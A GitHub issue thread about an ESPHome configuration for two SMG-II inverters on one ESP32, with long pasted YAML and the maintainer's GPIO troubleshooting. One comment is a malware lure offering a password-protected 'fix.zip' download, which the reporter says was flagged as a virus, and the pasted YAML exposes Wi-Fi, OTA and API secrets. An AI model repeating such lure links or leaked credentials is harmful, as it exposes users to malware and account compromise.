syssi/esphome-smg-ii #64: esp32-example-advanced-multiple

amgstone, 2024-08-28:
I have this version installed  esp32-example-advanced-multiple-uarts.yaml. 
when I disconnect and then connect the power from esp, then the data exchange is lost. The only option to start data exchange is to remove the plug from the inverter and then insert it again.

syssi, 2024-08-28:
Is the ESP board equipped with an USB-to-TTL converter? Are you able (temporary) to receive log messages of the ESP using an USB cable? I guess the ESP won't boot if the inverter is connected. As soon you disconnect the inverter the ESP is able to boot up because important GPIOs aren't pulled down/high anymore. Could you try to verify this idea?

amgstone, 2024-08-28:
I did not understand what I should do

syssi, 2024-08-28:
As first step: Could you provide your YAML? I would like to check the used GPIOs.

chenkeyu123, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

amgstone, 2024-08-28:
A virus has been detected.

amgstone, 2024-08-28:
substitutions:
  name: smg-smg-jk
  device_description: "Monitor and control two SMG II inverters via RS232 and a JK-BMS via BLE"
  smg0: "smg-ii-2"
  smg1: "smg-ii"
  tx_pin: GPIO16
  rx_pin: GPIO17
  tx_pin2: GPIO32
  rx_pin2: GPIO33

esphome:
  name: ${name}
  comment: ${device_description}
  project:
    name: "syssi.esphome-smg-ii"
    version: 1.2.0

# Enable logging
logger:
  level: DEBUG

# Enable Home Assistant API
api:
  encryption:
    key: "/CygovYCtBf+QZ45PwP5RkdWiYWU9M8sszin+/1N3rA="

ota:
  platform: esphome
#ota:
  password: "4a82a31dfe1dc003f3c69e73e5f12cbf"

esp32:
  board: wemos_d1_mini32
  framework:
    type: esp-idf

wifi:
  ssid: "Irena_house_router"
  password: "1212121212"

  manual_ip:
    static_ip: 192.168.31.159
    gateway: 192.168.31.1
    subnet: 255.255.255.0

  ap:
    ssid: "Smg-Twin Fallback Hotspot"
    password: "YToMSNOqgNUp"

uart:
  - id: uart_0
    baud_rate: 9600
    tx_pin: ${tx_pin}
    rx_pin: ${rx_pin}
  - id: uart_1
    baud_rate: 9600
    tx_pin: ${tx_pin2}
    rx_pin: ${rx_pin2}

modbus:
  - id: modbus0
    uart_id: uart_0
    send_wait_time: 200ms

  - id: modbus1
    uart_id: uart_1
    send_wait_time: 200ms

modbus_controller:
  - id: smg0
[... 1908 lines cut ...]
        if (!values.empty()) {
          values.pop_back();
        }
      }
      return values;

  # Operation Mode                                                UInt  201 1 R 0: Power On, 1: Standby, 2: Mains, 3: Off-Grid, 4: Bypass, 5: Charging, 6: Fault
  - platform: modbus_controller
    modbus_controller_id: smg1
    name: "${smg1} operation mode"
    address: 201
    register_type: holding
    raw_encode: HEXBYTES
    lambda: |-
      uint16_t value = modbus_controller::word_from_hex_str(x, 0);
      switch (value) {
        case 0: return std::string("Power On");
        case 1: return std::string("Standby");
        case 2: return std::string("Mains");
        case 3: return std::string("Off-Grid");
        case 4: return std::string("Bypass");
        case 5: return std::string("Charging");
        case 6: return std::string("Fault");
      }
      return std::string("Unknown");

amgstone, 2024-08-28:
`substitutions:
  name: smg-smg-jk
  device_description: "Monitor and control two SMG II inverters via RS232 and a JK-BMS via BLE"
  smg0: "smg-ii-2"
  smg1: "smg-ii"
  tx_pin: GPIO16
  rx_pin: GPIO17
  tx_pin2: GPIO32
  rx_pin2: GPIO33

esphome:
  name: ${name}
  comment: ${device_description}
  project:
    name: "syssi.esphome-smg-ii"
    version: 1.2.0

# Enable logging
logger:
  level: DEBUG

# Enable Home Assistant API
api:
  encryption:
    key: "/CygovYCtBf+QZ45PwP5RkdWiYWU9M8sszin+/1N3rA="

ota:
  platform: esphome
#ota:
  password: "4a82a31dfe1dc003f3c69e73e5f12cbf"

esp32:
  board: wemos_d1_mini32
  framework:
    type: esp-idf

wifi:
  ssid: "Irena_house_router"
  password: "1212121212"

  manual_ip:
    static_ip: 192.168.31.159
    gateway: 192.168.31.1
    subnet: 255.255.255.0

  ap:
    ssid: "Smg-Twin Fallback Hotspot"
    password: "YToMSNOqgNUp"

uart:
  - id: uart_0
    baud_rate: 9600
    tx_pin: ${tx_pin}
    rx_pin: ${rx_pin}
  - id: uart_1
    baud_rate: 9600
    tx_pin: ${tx_pin2}
    rx_pin: ${rx_pin2}

modbus:
  - id: modbus0
    uart_id: uart_0
    send_wait_time: 200ms

  - id: modbus1
    uart_id: uart_1
    send_wait_time: 200ms

modbus_controller:
  - id: smg0
[... 1911 lines cut ...]
      }
      return values;

  # Operation Mode                                                UInt  201 1 R 0: Power On, 1: Standby, 2: Mains, 3: Off-Grid, 4: Bypass, 5: Charging, 6: Fault
  - platform: modbus_controller
    modbus_controller_id: smg1
    name: "${smg1} operation mode"
    address: 201
    register_type: holding
    raw_encode: HEXBYTES
    lambda: |-
      uint16_t value = modbus_controller::word_from_hex_str(x, 0);
      switch (value) {
        case 0: return std::string("Power On");
        case 1: return std::string("Standby");
        case 2: return std::string("Mains");
        case 3: return std::string("Off-Grid");
        case 4: return std::string("Bypass");
        case 5: return std::string("Charging");
        case 6: return std::string("Fault");
      }
      return std::string("Unknown");

    
    `

syssi, 2024-08-28:
Hmm..  I use this webseite to verify which GPIOs are safe to use: https://randomnerdtutorials.com/esp32-pinout-reference-gpios/

Your GPIOs aren't in use for ESP boot configurations etc.

```
  tx_pin: GPIO16
  rx_pin: GPIO17
  tx_pin2: GPIO32
  rx_pin2: GPIO33
```

The root cause of the issue must be something else. Does your ESP32 board have an USB connector?

amgstone, 2024-08-28:
Just found this amazing item on AliExpress. Check it out! 
грн.89.01 | ESP32 Development Board WiFi+Bluetooth Ultra-Low Power Consumption Dual Core CPU ESP-32S ESP32-CAM ESP-WROOM-32D/U CH9102X
https://a.aliexpress.com/_Ez1nvBr

syssi, 2024-08-29:
Which board do you use exactly?

amgstone, 2024-09-01:
Good day, I have two inverters connected to one esp32. I want to split esp32 into two. Please provide a sample code for this operation. Because I understand that if I fill in two identical codes, it will not work like that.

Maybe this way the work will become more stable.

amgstone, 2024-09-04:
Can you help me with the written code?

syssi, 2024-09-04:
Please use this example on both ESPs: https://github.com/syssi/esphome-smg-ii/blob/main/esp32-example.yaml

Just change the second line:

```
substitutions:
  name: smg-ii-first
```

```
substitutions:
  name: smg-ii-second
```

That's all!

amgstone, 2024-09-17:
installed esp32 cream for each inverter and everything works stably. so there is some problem in the firmware for the two inverters.

syssi, 2024-09-17:
Let's close this issue.

closed 2024-09-17 by syssi